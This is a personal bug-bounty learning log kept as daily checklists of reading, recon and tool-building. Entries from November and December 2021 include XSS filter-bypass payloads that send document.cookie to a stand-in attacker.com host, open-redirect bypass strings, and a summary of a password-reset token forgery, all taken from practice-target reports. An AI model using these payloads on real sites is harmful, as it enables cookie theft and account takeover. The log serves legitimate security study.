100DaysofLearning Daily Checklist - ✅

i create this repo inspired by @AnubhavSingh_(https://github.com/anubhavsinghhacker) and @vish_hal(https://github.com/vish-hal/) bhai, what i do everyday i will update daily on my github repo.

---------------------------------------------------------

Date - 28/11/2021

---------------------------------------------------------

Date - 29/11/2021

---------------------------------------------------------

Date - 30/11/2021

  • #solve tryhackme room

  • #read zseano print book ✅ page - 12-17 / 8:30 - 9:17

  • #read firstblood1/2 Disclosed report ✅

  • #want to create some usefull tool (if possible)

  • #try to do some manual recon on BugBounty program / JS recon

  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..

  • #try to read 1 intrigity-blog Bug-Bytes per day

  • #try to read payload artirst weekly blog

  • #try to read anurag sr news latter

  • #try to daily hunt on "fastfoodhacking"

  • #doing some recon on shodan ✅ 9:30 - 12:20

  • #doing some recon on censys

  • #read disclosed report

  • # Today Dheeraj sir task is

    • learn what is lighthouse ✅ (compelete Date - 28/11/2021)
    • learn prototype polution ✅
      • watch 35 minit 9:00 - 11:00

---------------------------------------------------------

Date - 1/12/2021

  • solve tryhackme room
  • read zseano print book
  • read firstblood1/2 Disclosed report
  • want to create some usefull tool (if possible) ✅ 9:00 - 3:40 / 9:30 - 12:40 - creating shodan automaion
  • try to do some manual recon on BugBounty program / JS recon
  • leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
  • try to read 1 intrigity-blog Bug-Bytes per day
  • try to read payload artirst weekly blog
  • try to read anurag sr news latter
  • try to daily hunt on "fastfoodhacking"
  • read disclosed report

---------------------------------------------------------

Date - 2/11/2021

  • #solve tryhackme room
  • #read zseano print book
  • #read firstblood1/2 Disclosed report
  • #want to create some usefull tool (if possible) ✅
    • Build some useful droks 9:00 - 1:00 | 5:38 - 1:20
  • #try to do some manual recon on BugBounty program / JS recon
  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc.. ✅
    • apache - > server-status
  • #try to read 1 intrigity-blog Bug-Bytes per day
  • #try to read payload artirst weekly blog
  • #try to read anurag sr news latter
  • #try to daily hunt on "fastfoodhacking"
  • #read disclosed report

---------------------------------------------------------

Date - 3/11/2021

  • #solve tryhackme room

  • #read zseano print book

  • #read firstblood1/2 Disclosed report

  • #want to create some usefull tool (if possible) ✅

    • solve i "sleep" cmd problem ✅ 8:16 - 9:41 | 9:41 AM - 7:30
  • #try to do some manual recon on BugBounty program / JS recon

  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..

  • #try to read 1 intrigity-blog Bug-Bytes per day

  • #try to read payload artirst weekly blog

  • #try to read anurag sr news latter

  • #try to daily hunt on "fastfoodhacking"

  • #read disclosed report

--------------------------------------------------------- Date - 4/11/2021

  • #solve tryhackme room
  • #read zseano print book
  • #read firstblood1/2 Disclosed report ✅
  • #want to create some usefull tool (if possible)
  • #try to do some manual recon on BugBounty program / JS recon
  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
  • #try to read 1 intrigity-blog Bug-Bytes per day
  • #try to read payload artirst weekly blog
  • #try to read anurag sr news latter
  • #try to daily hunt on "fastfoodhacking"
  • #read disclosed report

---------------------------------------------------------

Date - 5/11/2021

  • #solve tryhackme room ✅

  • #read zseano print book

  • #read firstblood1/2 Disclosed report

  • #want to create some usefull tool (if possible)

  • #try to do some manual recon on BugBounty program / JS recon

  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..

  • #try to read 1 intrigity-blog Bug-Bytes per day

  • #try to read payload artirst weekly blog

  • #try to read anurag sr news latter

  • #try to daily hunt on "fastfoodhacking"

  • #read disclosed report

---------------------------------------------------------

Date - 6/11/2021

  • #solve tryhackme room ✅ 11:38 - 1:00
  • #read zseano print book
  • #read firstblood1/2 Disclosed report
  • #want to create some usefull tool (if possible) ✅
  • #try to do some manual recon on BugBounty program / JS recon
  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
  • #try to read 1 intrigity-blog Bug-Bytes per day
  • #try to read payload artirst weekly blog
  • #try to read anurag sr news latter
  • #try to daily hunt on "fastfoodhacking"
  • #read disclosed report

---------------------------------------------------------

Date - 7/11/2021

---------------------------------------------------------

Date - 8/11/2021

Bypasses

				- ja%09vascript
				- ja%0avascript
				- ja%0dvascript
				- http://firstbloodhackers.com/login.php?ref=ja%09vascript:window.location.href=%60http://attacker.com/$%7Bdocument.cookie%7D%60
				- http://firstbloodhackers.com/login.php?ref=ja	vascript:window.location.href=`http://attacker.com/${document.cookie}`
				- %09 -> Tab
				- %60 -> `
				- %7B - > {
				- %7D - }
				- %60 -> `
				
  • #want to create some usefull tool (if possible) ✅

  • #try to do some manual recon on BugBounty program / JS recon ✅

  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..

  • #try to read 1 intrigity-blog Bug-Bytes per day

  • #try to read payload artirst weekly blog

  • #try to read anurag sr news latter

  • #try to daily hunt on "fastfoodhacking"

  • #read disclosed report

---------------------------------------------------------

Date - 9/11/2021

---------------------------------------------------------

Date - 10/11/2021

  • solve tryhackme room
  • read zseano print book
  • read firstblood1/2 Disclosed report
  • want to create some usefull tool (if possible) ✅ 8:49 - 1:00
    • careating nuclei tamplates for hardcoded scanning.
  • try to do some manual recon on BugBounty program / JS recon
  • leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
  • try to read 1 intrigity-blog Bug-Bytes per day
  • try to read payload artirst weekly blog
  • try to read anurag sr news latter
  • try to daily hunt on "fastfoodhacking"
  • read disclosed report

---------------------------------------------------------

Date - 11/12/2021

  • solve tryhackme room ✅ - answer 1 question. 😒
  • read zseano print book
  • read firstblood1/2 Disclosed report
  • want to create some usefull tool (if possible) ✅
    • careating nuclei tamplates for hardcoded scanning.
    • public my tool on github. 😍
    • create private project "android nuclei tamplates"
  • try to do some manual recon on BugBounty program / JS recon
  • leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
  • try to read 1 intrigity-blog Bug-Bytes per day
  • try to read payload artirst weekly blog
  • try to read anurag sr news latter
  • try to daily hunt on "fastfoodhacking"
  • read disclosed report

---------------------------------------------------------

Date - 12/12/2021

  • #solve tryhackme room ✅ 8:00AM - 12:00PM

  • #read zseano print book

  • #read firstblood1/2 Disclosed report

  • #want to create some usefull tool (if possible) ✅

    • create 100DaysofLearning GitHub project and update all Daily Checklist. 5:00AM - 7:00AM
    • working android nuclei for hardcoded scan. | 6:00PM - 7:00PM | 11:30PM - 1:28PM
  • #try to do some manual recon on BugBounty program / JS recon

  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..

  • #try to read 1 intrigity-blog Bug-Bytes per day

  • #try to read payload artirst weekly blog

  • #try to read anurag sr news latter

  • #try to daily hunt on "fastfoodhacking"

  • #read disclosed report

---------------------------------------------------------

Date - 13/12/2021

  • #solve tryhackme room ✅

      • answer 1 question. 😒
  • #read zseano print book

  • #read firstblood1/2 Disclosed report ✅

    • https://www.bugbountyhunter.com/hackevents/report?id=465 | 9:00AM - 10:35AM | (Reflected XSS on /login.php through the "goto" parameter leading to ATO)-(holybugx)-(quality report) 👌🏻

        GET /login.php?goto=holy
        	\_reflected-value on source code
        		\_<input name="goto" value="holy" type="hidden">
      
      
        GET /login.php?goto=holy<"'>
        	\_reflected-value on source code
        		\_<input name="goto" value="holy<"'>  --> input tag is closed
        			" type="hidden">
      
      
        My thought we can also do like this:
        ------------------------------------
        holy<"'>  -> holy"<' > (i dont know it can't be)
      
      
        autofocus meanings:
        -------------------
        The autofocus attribute is a boolean attribute.
        When present, it specifies that the element should automatically get focus when the page loads.
      
      
        onfocusin:
        ----------
        Execute a JavaScript when an input field is about to get focus.
      
      
        Payload:
        -------
        https://firstbloodhackers.com/login.php?goto=xyz%22%20autofocus%20onfocusin=%22window.location.href=`http://Attacker.com/?${document.cookie}`%22%3E
      
      
        Ultimate Payload:
        -----------------
        XSS payload are awesome.
      
        when the value is reflected in source-code and using "autofocus" the input field automatically get in focus 
        and "onfocusin" listening for any upcoming focus then he execute the JavaScript and BOOM.  
      
      
        <input name="goto" value="xyz" autofocus onfocusin="window.location.href=`http://Attacker.com/?${document.cookie}`">
      
  • #want to create some usefull tool (if possible)

  • #try to do some manual recon on BugBounty program / JS recon

  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc.. ✅

    • learned something abount jquary
  • #try to read 1 intrigity-blog Bug-Bytes per day

  • #try to read payload artirst weekly blog

  • #try to read anurag sr news latter

  • #try to daily hunt on "fastfoodhacking" ✅

    • Found something intersting .
  • #read disclosed report ✅

---------------------------------------------------------

Date - 14/12/2021

  • #solve tryhackme room ✅

    • answer 1 question. 😒
  • #read zseano print book

  • #read firstblood1/2 Disclosed report

  • #want to create some usefull tool (if possible)

  • #try to do some manual recon on BugBounty program / JS recon

  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc.. ✅

    • learned something abount jquary (CVE-2020-11023)
  • #try to read 1 intrigity-blog Bug-Bytes per day

  • #try to read payload artirst weekly blog

  • #try to read anurag sr news latter

  • #try to daily hunt on "fastfoodhacking" ✅

    • found one bug.
    • found one flag.
  • #read disclosed report

---------------------------------------------------------

Date - 15/12/2021

Noting doing today.

---------------------------------------------------------

Date - 16/12/2021

  • #solve tryhackme room ✅

    • answerd some question
  • #read zseano print book

  • #read firstblood1/2 Disclosed report ✅

    • prrrevious read

      • https://www.bugbountyhunter.com/hackevents/report?id=586 (Open Redirect on logout.php endpoint [Bypass])-(holybugx)-(quality report)👌

        • // -> are filterd, she using backsalash in the middle of forward-salash. Like - "//"
        • //domain.com -> //domain.com
      • https://www.bugbountyhunter.com/hackevents/report?id=47 (Open redirect on the logout.php endpoint [COLLAB])-(holybugx)👌

        • first // filterd and bypass are => "//attacker.com"
        • Then devloper convert - "" to - '.'
        • if attacker put this payload => //attacker.com OutPut Could be like - /./attacker.com
        • for bypass this instead of using back-salash '' she use -> %09 Tab-Character
        • ultimate pyload could be -> /%09/attacker.com
  • #want to create some usefull tool (if possible)

  • #try to do some manual recon on BugBounty program / JS recon ✅

  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..

  • #try to read 1 intrigity-blog Bug-Bytes per day

  • #try to read payload artirst weekly blog

  • #try to read anurag sr news latter

  • #try to daily hunt on "fastfoodhacking"

  • #read disclosed report

---------------------------------------------------------

Date - 17/12/2021

---------------------------------------------------------

Date - 18/12/2021

---------------------------------------------------------

Date - 19/12/2021

---------------------------------------------------------

Date - 20/12/2021

  • #solve tryhackme room ✅
    • one question only.
  • #read zseano print book
  • #read firstblood1/2 Disclosed report
  • #want to create some usefull tool (if possible)
  • #try to do some manual recon on BugBounty program / JS recon
  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
  • #try to read 1 intrigity-blog Bug-Bytes per day
  • #try to read payload artirst weekly blog
  • #try to read anurag sr news latter
  • #try to daily hunt on "fastfoodhacking"
  • #read disclosed report ✅
    • https://infosecwriteups.com/an-interesting-account-takeover-3a33f42d609d (An Interesting Account Takeover!!) (vulnerability found on password reset-funcation)

      • when user try reset passwd
        • USER must enter a valid Profile-Id
          • Then guy found "state" parameter (if Profile ID is valid)
        • Then password reset link is sent to the Users registered E-mail.
        • He check this token on CyberChef
          • Token (789c0dc8610a80200c06d0bbec049bc9d26f870921834192a4ffa2bbd7fbf90a029e810c9adeea98a5753287a844e16555b1016150bfafc3cfbaf94eff2450e494a2e640f67ebc89137aade927d25a020ab2535ab4b5c9dc4fd1)
          • decrypts back to (Encoded Mthods are - Zlib-deflated and Hex)
            • “a:2:{s:9:”timestamp”;i:1614104013;s:10:”profile_id”;s:8:”40884692";}”
        • he create another token
          • Token
            • 789c0dc8510a85201005d0bdcc0ac6f25da6eb62427806034992fe457bb7df93b9f0e9dc28c36be923d726c919107ec0aa40ea0c4a69f775f85976ffcb2746891a610693f44ebe171387
        • he try cratf LINK (BUT link doesn't work) - (beacuse of token length)
        • he asked question on reddit (he found some solution)
          • what he found
            • Zlib includes an ADLER32 checksum if you use the Adler-32_Checksum() function after inflating you get BC89137A,
              • This is the first Token (where checksum is present)
                • 789c0dc8610a80200c06d0bbec049bc9d26f870921834192a4ffa2bbd7fbf90a029e810c9adeea98a5753287a844e16555b1016150bfafc3cfbaf94eff2450e494a2e640f67ebc89137aade927d25a020ab2535ab4b5c9dc4fd1 (here you can find checksum)
              • Secound Token
                • 789c0dc8510a85201005d0bdcc0ac6f25da6eb62427806034992fe457bb7df93b9f0e9dc28c36be923d726c919107ec0aa40ea0c4a69f775f85976ffcb2746891a610693f44ebe171387 (there is no checksum)
          • he also noticed that this checksum is presend in first token.
        • Now he solve length issue.
        • Then he found some endpoint on JS file.
        • He try Brute Force that endpoint (what is added after checksum she found)
        • Then BOOM (:)
    • https://blog.0iq.me/ (realy awesome Writeup or Blog for BugBounty )

---------------------------------------------------------

Date - 21/12/2021

---------------------------------------------------------

Date - 22/12/2021

  • #solve tryhackme room ✅
    • one question only.
  • #read zseano print book
  • #read firstblood1/2 Disclosed report
  • #want to create some usefull tool (if possible)
  • #try to do some manual recon on BugBounty program / JS recon ✅
  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
  • #try to read 1 intrigity-blog Bug-Bytes per day
  • #try to read payload artirst weekly blog
  • #try to read anurag sr news latter
  • #try to daily hunt on "fastfoodhacking"
  • #read disclosed report
  • #JS ENUMERATION ✅

---------------------------------------------------------

Date - 23/12/2021

  • #solve tryhackme room ✅
    • one question only.
  • #read zseano print book
  • #read firstblood1/2 Disclosed report
  • #want to create some usefull tool (if possible)
  • #try to do some manual recon on BugBounty program / JS recon ✅
  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
  • #try to read 1 intrigity-blog Bug-Bytes per day
  • #try to read payload artirst weekly blog
  • #try to read anurag sr news latter
  • #try to daily hunt on "fastfoodhacking"
  • #read disclosed report ✅

---------------------------------------------------------

Date - 24/12/2021

  • #solve tryhackme room ✅
    • one question only.
  • #read zseano print book
  • #read firstblood1/2 Disclosed report
  • #want to create some usefull tool (if possible)
  • #try to do some manual recon on BugBounty program / JS recon ✅
  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
  • #try to read 1 intrigity-blog Bug-Bytes per day
  • #try to read payload artirst weekly blog
  • #try to read anurag sr news latter
  • #try to daily hunt on "fastfoodhacking"
  • #read disclosed report ✅

---------------------------------------------------------

Date - 25/12/2021

(Today i am doing nothing beacuse tommorrow my second vacine was completed and i am feeling pain in my brain today.)

---------------------------------------------------------

Date - 26/12/2021

  • #solve tryhackme room
  • #read zseano print book
  • #read firstblood1/2 Disclosed report
  • #want to create some usefull tool (if possible)
  • #try to do some manual recon on BugBounty program / JS recon ✅
    • find lots of this and extra.
  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
  • #try to read 1 intrigity-blog Bug-Bytes per day
  • #try to read payload artirst weekly blog
  • #try to read anurag sr news latter
  • #try to daily hunt on "fastfoodhacking"
  • #read disclosed report

---------------------------------------------------------

Date - 27/12/2021

  • #solve tryhackme room
  • #read zseano print book
  • #read firstblood1/2 Disclosed report
  • #want to create some usefull tool (if possible)
  • #try to do some manual recon on BugBounty program / JS recon ✅
    • attacking jwt token
  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
  • #try to read 1 intrigity-blog Bug-Bytes per day
  • #try to read payload artirst weekly blog
  • #try to read anurag sr news latter
  • #try to daily hunt on "fastfoodhacking"
  • #read disclosed report

---------------------------------------------------------

Date - 28/12/2021

  • #solve tryhackme room
  • #read zseano print book (Toady Read Page-No 18 - 20 )✅ Time - 8:30 10:20
  • #read Bug Bounty Bootcamp by ( vickie li) ✅
    • chapter one (page 1-3)
  • #read firstblood1/2 Disclosed report
  • #want to create some usefull tool (if possible) ✅
    • add some regexs my nuclei templete
  • #try to do some manual recon on BugBounty program / JS recon
  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
  • #try to read 1 intrigity-blog Bug-Bytes per day
  • #try to read payload artirst weekly blog
  • #try to read anurag sr news latter
  • #try to daily hunt on "fastfoodhacking"
  • #read disclosed report ✅

---------------------------------------------------------

Date - 29/12/2021

---------------------------------------------------------

Date - 30/12/2021

  • #solve tryhackme room
  • #read zseano print book
  • #read firstblood1/2 Disclosed report
  • #want to create some usefull tool (if possible) ✅
    • check every regex in my nuclei work properly or not .
    • checking is completed.
  • #try to do some manual recon on BugBounty program / JS recon
  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
  • #try to read 1 intrigity-blog Bug-Bytes per day
  • #try to read payload artirst weekly blog
  • #try to read anurag sr news latter
  • #try to daily hunt on "fastfoodhacking"
  • #read disclosed report

---------------------------------------------------------

Date - 31/12/2021

  • #solve tryhackme room
  • #read zseano print book
  • #read firstblood1/2 Disclosed report
  • #want to create some usefull tool (if possible) ✅
    • i am create small bash script and etc i will tell in future.
  • #try to do some manual recon on BugBounty program / JS recon ✅
  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
  • #try to read 1 intrigity-blog Bug-Bytes per day
  • #try to read payload artirst weekly blog
  • #try to read anurag sr news latter
  • #try to daily hunt on "fastfoodhacking"
  • #read disclosed report
  • #watching dheeraj sir video on pentester academy video ✅

---------------------------------------------------------

Date - 1/1/2022

  • #solve tryhackme room
  • #read zseano print book
  • #read firstblood1/2 Disclosed report
  • #want to create some usefull tool (if possible)
  • #try to do some manual recon on BugBounty program / JS recon ✅
  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
  • #try to read 1 intrigity-blog Bug-Bytes per day
  • #try to read payload artirst weekly blog
  • #try to read anurag sr news latter
  • #try to daily hunt on "fastfoodhacking"
  • #read disclosed report

---------------------------------------------------------

Date - 2/1/2022

  • #solve tryhackme room
  • #read zseano print book
  • #read firstblood1/2 Disclosed report
  • #want to create some usefull tool (if possible)
  • #try to do some manual recon on BugBounty program / JS recon ✅
  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
  • #try to read 1 intrigity-blog Bug-Bytes per day
  • #try to read payload artirst weekly blog
  • #try to read anurag sr news latter
  • #try to daily hunt on "fastfoodhacking"
  • #read disclosed report
  • #learn python ✅

---------------------------------------------------------

Date - 3/1/2022

  • #solve tryhackme room
  • #read zseano print book
  • #read firstblood1/2 Disclosed report
  • #want to create some usefull tool (if possible)
  • #try to do some manual recon on BugBounty program / JS recon ✅
  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
  • #try to read 1 intrigity-blog Bug-Bytes per day
  • #try to read payload artirst weekly blog
  • #try to read anurag sr news latter
  • #try to daily hunt on "fastfoodhacking"
  • #read disclosed report

---------------------------------------------------------

Date - 4/1/2022

  • #solve tryhackme room
  • #read zseano print book
  • #read firstblood1/2 Disclosed report
  • #want to create some usefull tool (if possible)
  • #try to do some manual recon on BugBounty program / JS recon ✅
  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
  • #try to read 1 intrigity-blog Bug-Bytes per day
  • #try to read payload artirst weekly blog
  • #try to read anurag sr news latter
  • #try to daily hunt on "fastfoodhacking"
  • #read disclosed report ✅
  • #watch dheeraj sir seassion [Cli Compromise detect] ✅
  • #learn python ✅
    • using python how to make Http Request.
    • using different method.

---------------------------------------------------------

Date - 5/1/2022

  • #solve tryhackme room
  • #read zseano print book
  • #read firstblood1/2 Disclosed report
  • #want to create some usefull tool (if possible)
  • #try to do some manual recon on BugBounty program / JS recon ✅
  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
  • #try to read 1 intrigity-blog Bug-Bytes per day
  • #try to read payload artirst weekly blog
  • #try to read anurag sr news latter
  • #try to daily hunt on "fastfoodhacking"
  • #read disclosed report ✅
  • #learn python ✅

---------------------------------------------------------

Date - 6/1/2022

  • #solve tryhackme room
  • #read zseano print book
  • #read firstblood1/2 Disclosed report
  • #want to create some usefull tool (if possible)
  • #try to do some manual recon on BugBounty program / JS recon ✅
    • reported bug. ✅
  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
  • #try to read 1 intrigity-blog Bug-Bytes per day
  • #try to read payload artirst weekly blog
  • #try to read anurag sr news latter
  • #try to daily hunt on "fastfoodhacking"
  • #read disclosed report

---------------------------------------------------------

Date - 7/1/2022

  • #solve tryhackme room
  • #read zseano print book
  • #read firstblood1/2 Disclosed report
  • #want to create some usefull tool (if possible)
  • #try to do some manual recon on BugBounty program / JS recon ✅
  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
  • #try to read 1 intrigity-blog Bug-Bytes per day
  • #try to read payload artirst weekly blog
  • #try to read anurag sr news latter
  • #try to daily hunt on "fastfoodhacking"
  • #read disclosed report ✅
  • #learn python ✅
    • classes and object

---------------------------------------------------------

Date - 8/1/2022

---------------------------------------------------------

Date - 9/1/2022

---------------------------------------------------------

Date - 10/1/2022

---------------------------------------------------------

Date - 11/1/2022

---------------------------------------------------------

Date = 12/1/2022

---------------------------------------------------------

Date - 13/1/2022

  • #solve tryhackme room
  • #read zseano print book
  • #read firstblood1/2 Disclosed report
  • #want to create some usefull tool (if possible)
  • #try to do some manual recon on BugBounty program / JS recon ✅
    • clear some confusion.
  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
  • #try to read 1 intrigity-blog Bug-Bytes per day
  • #try to read payload artirst weekly blog
  • #try to read anurag sr news latter
  • #try to daily hunt on "fastfoodhacking"
  • #read disclosed report✅

---------------------------------------------------------

Date -14/1/2022

  • #solve tryhackme room
  • #read zseano print book
  • #read firstblood1/2 Disclosed report
  • #want to create some usefull tool (if possible)
  • #try to do some manual recon on BugBounty program / JS recon ✅
  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
  • #try to read 1 intrigity-blog Bug-Bytes per day
  • #try to read payload artirst weekly blog
  • #try to read anurag sr news latter
  • #try to daily hunt on "fastfoodhacking"
  • #read disclosed report

---------------------------------------------------------

Date - 15/1/2022

  • #solve tryhackme room
  • #read zseano print book
  • #read firstblood1/2 Disclosed report
  • #want to create some usefull tool (if possible)
  • #try to do some manual recon on BugBounty program / JS recon ✅
  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
  • #try to read 1 intrigity-blog Bug-Bytes per day
  • #try to read payload artirst weekly blog
  • #try to read anurag sr news latter
  • #try to daily hunt on "fastfoodhacking"
  • #read disclosed report ✅

---------------------------------------------------------

Date - 16/1/2022

---------------------------------------------------------

Date - 17/1/2022

  • #solve tryhackme room
  • #read zseano print book
  • #read firstblood1/2 Disclosed report
  • #want to create some usefull tool (if possible)
  • #try to do some manual recon on BugBounty program / JS recon ✅
  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
  • #try to read 1 intrigity-blog Bug-Bytes per day
  • #try to read payload artirst weekly blog
  • #try to read anurag sr news latter
  • #try to daily hunt on "fastfoodhacking"
  • #read disclosed report

---------------------------------------------------------

Date - 18/1/2022

---------------------------------------------------------

Date - 22/1/2022

---------------------------------------------------------

Date - 24/1/2022

  • #solve tryhackme room
  • #read zseano print book
  • #read firstblood1/2 Disclosed report
  • #want to create some usefull tool (if possible)
  • #try to do some manual recon on BugBounty program / JS recon
  • #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
  • #try to read 1 intrigity-blog Bug-Bytes per day
  • #try to read payload artirst weekly blog
  • #try to read anurag sr news latter
  • #try to daily hunt on "fastfoodhacking"
  • #read disclosed report
  • #revise some network topic ✅
    • IP Address
    • Bridge,PoE(Power over Ethernet)

---------------------------------------------------------

Date - 26/1/2022

---------------------------------------------------------

Date - 27/1/2022

---------------------------------------------------------

Date - 1/2/2022

---------------------------------------------------------

Date - 5/2/2022

---------------------------------------------------------

Date - 26/4/2022

---------------------------------------------------------

Date - 30/4/2022

---------------------------------------------------------

Date - 1/5/2022

---------------------------------------------------------

Date - 3/5/2022

---------------------------------------------------------

Date - 4/5/2022

---------------------------------------------------------

Date - 7/5/2022

  • #read disclosed report ✅
    • working on python project

---------------------------------------------------------

Date - 10/5/2022

  • #read disclosed report ✅
    • revise old linux topic.
    • Python Web Penetration Testing Cookbook [Page : 1-25]

---------------------------------------------------------

Date - 23/5/2022

---------------------------------------------------------

Date - 27/5/2022

  • #read disclosed report ✅
    • revisting python old topic (Ex- Data types, funcation, Dict, Tuples etc... )

---------------------------------------------------------

Date - 30/5/2022

  • #Today learn from jetking classes ✅
    • Learing about shared mail box in office 365

---------------------------------------------------------

Date - 31/5/2022

---------------------------------------------------------

Date - 1/6/2022

  • #read disclosed report ✅
    • Learing Bankend Technology About (Ex- Virtualization,Hypervisor,DC,Dcoker)

---------------------------------------------------------

Date - 2/6/2022

  • #Today learn from jetking classes ✅
    • Learning Office 365 {Teams application uses}
      • how to schedule metting

---------------------------------------------------------

Date - 6/6/2022

  • #Today learn from jetking classes ✅
    • Learning About Onedrive.
      • How to share any document from onedrive ?
      • How to share document to a specific person ?
      • How to share document to a specific Group ?

---------------------------------------------------------

Date - 7/6/2022

  • #Today learn from jetking classes ✅
    • Attend PD Class mock
    • watching old classes video

---------------------------------------------------------

Date - 14/6/2022

  • #Today learn from jetking classes ✅
    • Configuring rip
    • Learing About basic REQ,RES Header and etc.

---------------------------------------------------------

Date - 15/6/2022

  • #Today learn from jetking classes ✅
    • how to configure DHCP in router.
    • How to configure FTP in windows system.

---------------------------------------------------------

Date - 16/6/2022

  • #Today learn from jetking classes ✅

    • RAID-0 & RAID-1 configuration
    • How to create simple volume ?
    • How to create spanned volume ?[Dynamic disk ea ai gulo create korte hoba]
    • How to configure Raid-0 ?{dynamic volume}
    • How to create RAID1 or Mirrored Volume ?
  • #Pratical Done ✅

    • Configuring DHCP & RIP v1 in cisco packet tracer.
    • rip akta question jigasa korte hoba. ✅
    • how to configure DHCP in router ✅
  • #Dheeraj sir class

    • AWS Class Recording ✅ - Date [16/6/2022] - Time [7:59]

---------------------------------------------------------

Date - 17/6/2022

  • #Today learn from jetking classes ✅
    • Create outlook & configured outlook account.
    • Configured Telnet in router [Cisco Packet Tracer]
    • Offline file sharing

---------------------------------------------------------

Date - 18/6/2022

  • #Today learn from jetking classes ✅

    • Create outlook & configured outlook account.
    • Configured Telnet in router [Cisco Packet Tracer]
    • Offline file sharing
  • #Pratical Done ✅

    • Map network drive.
  • #Pending Task

    • ajke [telnet] er command gulo lekha hoy ni video ta dekhe likte hoba.✅ - Date [18/6/2022] - Time [9:02]
    • offline bapare sir ejta bolo sai video tau akbar dakte hoba. ✅ - Date [18/6/2022] - Time [9:30]
  • #Dheeraj sir class

    • How to Monitor Server,Serices,Docker Container Using Nagios. ✅

---------------------------------------------------------